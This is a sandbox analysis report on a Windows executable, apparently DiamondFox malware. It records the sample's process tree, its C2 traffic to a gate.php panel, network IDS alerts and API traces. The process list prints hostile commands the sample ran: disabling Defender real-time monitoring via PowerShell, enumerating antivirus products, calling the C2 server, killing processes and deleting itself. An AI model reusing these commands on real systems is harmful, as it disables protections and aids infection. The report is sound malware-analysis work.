Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 29, 2021, 1:50 p.m.	June 29, 2021, 1:52 p.m.

Size	203.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`b2600237508f0a8e5ca2c5c80018eaca`
SHA256	`f0d5d648196be621082563732760402a0d8bb78629f0beb6b2e5386ed53a5976`
CRC32	`689CB37B`
ssdeep	`6144:SnSNM0tFUkfgEYxE91e/QkqCh+FjvTBir+:SSN3zgpxooF3h+FjvTo6`
Yara	Antivirus - Contains references to security software IsPE32 - (no description) PE_Header_Zero - PE File Signature

microsoftedgecps.exe "C:\Users\test22\AppData\Local\Temp\microsoftedgecps.exe"
2088
- MicrosoftEdgeCPS.exe "C:\Users\test22\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
  540
  - powershell.exe "powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
    2256
  - WMIC.exe "wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
    2660
  - WMIC.exe "wmic" os get caption /FORMAT:List
    2364
  - WMIC.exe "wmic" path win32_VideoController get caption /FORMAT:List
    2800
  - WMIC.exe "wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
    2560
  - WMIC.exe "wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
    2892
  - WMIC.exe "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
    2444
  - WMIC.exe "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
    2740
  - MicrosoftEdgeCPS.exe /scomma "C:\Users\test22\AppData\Local\Temp\1.log"
    2988
  - MicrosoftEdgeCPS.exe /scomma "C:\Users\test22\AppData\Local\Temp\4.log"
    2128
  - MicrosoftEdgeCPS.exe /scomma "C:\Users\test22\AppData\Local\Temp\2.log"
    1836
  - MicrosoftEdgeCPS.exe /scomma "C:\Users\test22\AppData\Local\Temp\3.log"
    1080
  - MicrosoftEdgeCPS.exe X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    2060
  - MicrosoftEdgeCPS.exe X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    1052
  - MicrosoftEdgeCPS.exe X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    1812
  - MicrosoftEdgeCPS.exe X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
    2728
  - WMIC.exe "wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
    2064
  - WMIC.exe "wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
    1296
  - taskkill.exe "taskkill" /PID 2060 /F
    3032
  - taskkill.exe "taskkill" /PID 1052 /F
    2704
  - taskkill.exe "taskkill" /PID 1812 /F
    1408
  - taskkill.exe "taskkill" /PID 2728 /F
    204
  - taskkill.exe "taskkill" /PID 540 /F
    2276
  - powershell.exe "powershell" Start-Sleep -s 15;Start-Process 'C:\Users\test22\AppData\Roaming\EdgeCP\8958C14E0407.exe'
    2684
- powershell.exe "powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\test22\AppData\Local\Temp\microsoftedgecps.exe' -Force -Recurse
  1756
explorer.exe C:\Windows\Explorer.EXE
1848

Name	Response	Post-Analysis Lookup
diamond.serivice.com	A 195.133.40.146	195.133.40.146

IP Address	Status	Action
164.124.101.2	Active	Moloch
195.133.40.146	Active	Moloch
34.227.13.244	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49200 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49200 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49234 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2029144	ET MALWARE DiamondFox HTTP Post CnC Checkin M3	Malware Command and Control Activity Detected
TCP 192.168.56.101:49234 -> 195.133.40.146:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49234 -> 195.133.40.146:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49234 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49234 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 195.133.40.146:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49239 -> 195.133.40.146:80	2017930	ET MALWARE Trojan Generic - POST To gate.php with no referer	A Network Trojan was detected
TCP 192.168.56.101:49239 -> 195.133.40.146:80	2022985	ET MALWARE Trojan Generic - POST To gate.php with no accept headers	A Network Trojan was detected
TCP 192.168.56.101:49239 -> 195.133.40.146:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49239 -> 195.133.40.146:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic
TCP 195.133.40.146:80 -> 192.168.56.101:49238	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 67 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 29, 2021, 1:50 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 29, 2021, 1:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:51 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 29, 2021, 1:51 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (13 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:50 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:51 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:51 p.m.			0	0
IsDebuggerPresent June 29, 2021, 1:51 p.m.			0	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 29, 2021, 1:50 p.m.	buffer: The term 'Set-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW June 29, 2021, 1:50 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW June 29, 2021, 1:50 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW June 29, 2021, 1:50 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW June 29, 2021, 1:50 p.m.	buffer: + Set-MpPreference <<<< -DisableRealtimeMonitoring 1 console_handle: 0x00000053	1	1
WriteConsoleW June 29, 2021, 1:50 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Set-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW June 29, 2021, 1:50 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW June 29, 2021, 1:50 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: ERROR: The process "2060" not found. console_handle: 0x0000000b	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: SUCCESS: The process with PID 1052 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: ERROR: The process "1812" not found. console_handle: 0x0000000b	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: SUCCESS: The process with PID 2728 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: SUCCESS: The process with PID 540 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: Start-Process : This command cannot be executed due to the error: %1 is not a v console_handle: 0x00000023	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: alid Win32 application. console_handle: 0x0000002f	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: At line:1 char:32 console_handle: 0x0000003b	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: + Start-Sleep -s 15;Start-Process <<<< 'C:\Users\test22\AppData\Roaming\EdgeCP console_handle: 0x00000047	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: \8958C14E0407.exe' console_handle: 0x00000053	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x0000005f	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: erationException console_handle: 0x0000006b	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x00000077	1	1
WriteConsoleW June 29, 2021, 1:51 p.m.	buffer: ommands.StartProcessCommand console_handle: 0x00000083	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 137 events)

Time & API	Arguments	Status	Return
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a0ac8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1248 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a0a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a0a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a0a88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a0688 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
